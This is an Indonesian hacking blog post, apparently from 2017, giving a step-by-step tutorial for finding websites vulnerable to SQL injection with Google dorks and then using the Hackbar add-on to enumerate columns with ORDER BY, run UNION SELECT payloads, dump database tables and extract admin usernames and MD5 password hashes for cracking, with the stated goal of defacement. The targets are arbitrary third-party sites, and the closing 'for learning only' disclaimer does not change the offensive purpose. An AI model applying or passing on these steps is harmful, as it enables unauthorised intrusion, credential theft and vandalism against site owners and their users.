Tutorial Deface SQLi with Hackbar

Ok gans, kali ini w post Tutorial Deface SQLI with Hackbar ok oc? yang manual mah w ga bisa, jadi kapan kapan aja :'v oke lanjut

BAHAN :
- Hackbar : HERE
- Dork : inurl:list.php?id=
              inurl:listing.php?id=
- Udud
- Waifu yang menemani :)

STEP BY STEP :
1. install HACKBAR nya, hanya bisa di mozilla firefox

2. setelah install, dorking dulu di google ya

3. setelah menemukan target, kasih tanda ' di belakang angka target
    Example : www.target.com/list.php?id=69'
    NB : kalau ada perubahan pada web tersebut / error, berarti vuln SQL-i


4. Setelah itu cari column target,
    EXAMPLE =
    www.target.com/list.php?id=69 order by 1--  = > NO ERROR
    www.target.com/list.php?id=69 order by 2--  = > NO ERROR
    www.target.com/list.php?id=69 order by 3--  = > NO ERROR
    www.target.com/list.php?id=69 order by 4--  = > NO ERROR
    www.target.com/list.php?id=69 order by 5--  = > NO ERROR
    www.target.com/list.php?id=69 order by 6--  = > NO ERROR
    www.target.com/list.php?id=69 order by 7--  = > NO ERROR
    www.target.com/list.php?id=69 order by 8--  = > NO ERROR
    www.target.com/list.php?id=69 order by 9--  = > NO ERROR
    www.target.com/list.php?id=69 order by 10--  = > NO ERROR
    www.target.com/list.php?id=69 order by 11--  = >  ERROR
    BERARTI ITU COLUMN NYA ADA 10


5. Setelah mengetahui columnya, cari angka ajaib yang ada pada website tersebut
    Example : www.target.com/list.php?id=-69 union select 1,2,3,4,5,6,7,8,9,10--
    NB : Jangan lupa mengasih tanda " - " di belakang angka nya ya
    Oke dapat angka ajaibnya, yaitu angka 2 :'D

6. Hapus angka 2 nya, setelah itu klik UNION BASED > DIOS MySQL > Dios by Zen

7. Setelah itu, cari table user adminnya, tekan CTRL + F, trus cari USER

8. Setelah ketemu table user adminnya, klik UNION BASED > DATA > DATA ONE SHOT

9. Nanti disuruh isi column 3x
    1. DATABASE()
    2. user [ di samakan dengan table web target kamu ]
    3. uName,0x7c,uPass [ disamakan juga dengan column web target kamu ]




10, Setelah itu klik OK... dan muncullah USERNAME dan PASSWORD admin target :'D

Itu password nya masih dalam hash type MD5, jadi kalian decrypt ya :'D
Kalau gak ngerti silahkan tinggalkan komentarnya, kalau ada kesalahan mohon maaf, saya blogger pemula, jadi wajarkan aja :'v
Sekian Terimakasih


Sekianlah Postingan Dari GOPRESSXPLOITS Tentang " Tutorial Deface SQLi with Hackbar " Semoga Bisa Bermanfaat!.
Anda Sekarang Sedang Membaca Postingan " Tutorial Deface SQLi with Hackbar " Dengan URL http://www.gopressxploits.org/2017/12/tutorial-deface-sqli-with-hackbar.html
Jika Ada Content Yang Berbau Pantest, Postingan Tersebut Hanya Untuk Pembelajaran. Admin Tidak Bertanggung Jawab Jika Terjadi Sesuatu Kepada Anda.

Subscribe to receive free email updates:

0 Response to "Tutorial Deface SQLi with Hackbar"

Post a Comment